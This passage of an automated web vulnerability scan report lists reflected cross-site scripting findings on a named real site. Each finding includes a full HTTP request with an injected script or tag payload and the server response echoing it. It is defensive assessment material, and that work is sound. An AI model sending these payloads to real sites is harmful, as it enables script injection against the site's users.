GET /adult/themes/kosmos/images/review/0.giff1ab5<script>alert(1)</script>725cebe871e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/review/0.giff1ab5<script>alert(1)</script>725cebe871e was not found on this server.</p>
...[SNIP]...

2.397. http://www.resellerbase.com/adult/themes/kosmos/images/review/0.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/review/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5df4c<script>alert(1)</script>0bade085e80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/review/0.gif?5df4c<script>alert(1)</script>0bade085e80=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/review/0.gif?5df4c<script>alert(1)</script>0bade085e80=1 was not found on this server.</p>
...[SNIP]...

2.398. http://www.resellerbase.com/adult/themes/kosmos/images/review/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c5782<script>alert(1)</script>fb1fa2c80c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adultc5782<script>alert(1)</script>fb1fa2c80c2/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adultc5782<script>alert(1)</script>fb1fa2c80c2/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.399. http://www.resellerbase.com/adult/themes/kosmos/images/review/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b05d5<script>alert(1)</script>b31fa2c7aa2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themesb05d5<script>alert(1)</script>b31fa2c7aa2/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themesb05d5<script>alert(1)</script>b31fa2c7aa2/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.400. http://www.resellerbase.com/adult/themes/kosmos/images/review/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 784b6<script>alert(1)</script>51a1c484827 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos784b6<script>alert(1)</script>51a1c484827/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos784b6<script>alert(1)</script>51a1c484827/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.401. http://www.resellerbase.com/adult/themes/kosmos/images/review/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7b49a<script>alert(1)</script>d2fdc431f86 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images7b49a<script>alert(1)</script>d2fdc431f86/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images7b49a<script>alert(1)</script>d2fdc431f86/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.402. http://www.resellerbase.com/adult/themes/kosmos/images/review/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 9b80f<script>alert(1)</script>79dd06dfb4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/review9b80f<script>alert(1)</script>79dd06dfb4/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/review9b80f<script>alert(1)</script>79dd06dfb4/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.403. http://www.resellerbase.com/adult/themes/kosmos/images/review/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 3c831<script>alert(1)</script>a325bfee0cd was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/review/search.php3c831<script>alert(1)</script>a325bfee0cd?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/review/search.php3c831<script>alert(1)</script>a325bfee0cd?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.404. http://www.resellerbase.com/adult/themes/kosmos/images/review/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/review/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 78643<a>30227ea2606 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search78643<a>30227ea2606&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search78643<a>30227ea2606&opt=2 was not found on this server.</p>
...[SNIP]...

2.405. http://www.resellerbase.com/adult/themes/kosmos/images/review/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/review/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload acff7<a>ad11e83be04 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/themes/kosmos/images/review/search.php?keyword=search...acff7<a>ad11e83be04&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/review/search.php?keyword=search...acff7<a>ad11e83be04&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.406. http://www.resellerbase.com/adult/themes/kosmos/images/review/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/review/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ccefd<script>alert(1)</script>f9b734324cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&ccefd<script>alert(1)</script>f9b734324cb=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&ccefd<script>alert(1)</script>f9b734324cb=1 was not found on this server.</p>
...[SNIP]...

2.407. http://www.resellerbase.com/adult/themes/kosmos/images/review/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/review/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 3d8b3<a>bc16afcba37 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=23d8b3<a>bc16afcba37 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=23d8b3<a>bc16afcba37 was not found on this server.</p>
...[SNIP]...

2.408. http://www.resellerbase.com/adult/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 849a8<script>alert(1)</script>647f4b29232 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult849a8<script>alert(1)</script>647f4b29232/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult849a8<script>alert(1)</script>647f4b29232/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.409. http://www.resellerbase.com/adult/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 69906<script>alert(1)</script>6e5c9bb62a8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes69906<script>alert(1)</script>6e5c9bb62a8/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes69906<script>alert(1)</script>6e5c9bb62a8/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.410. http://www.resellerbase.com/adult/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e895b<script>alert(1)</script>1fa8dcb1aa5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmose895b<script>alert(1)</script>1fa8dcb1aa5/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmose895b<script>alert(1)</script>1fa8dcb1aa5/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.411. http://www.resellerbase.com/adult/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b72d1<script>alert(1)</script>dac947cd6ec was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/imagesb72d1<script>alert(1)</script>dac947cd6ec/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/imagesb72d1<script>alert(1)</script>dac947cd6ec/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.412. http://www.resellerbase.com/adult/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 16ada<script>alert(1)</script>b0c1e4ef207 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/search.php16ada<script>alert(1)</script>b0c1e4ef207?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/search.php16ada<script>alert(1)</script>b0c1e4ef207?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.413. http://www.resellerbase.com/adult/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload c667e<a>ffdf4374588 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchc667e<a>ffdf4374588&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchc667e<a>ffdf4374588&opt=2 was not found on this server.</p>
...[SNIP]...

2.414. http://www.resellerbase.com/adult/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload f016d<a>832c4d6e873 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

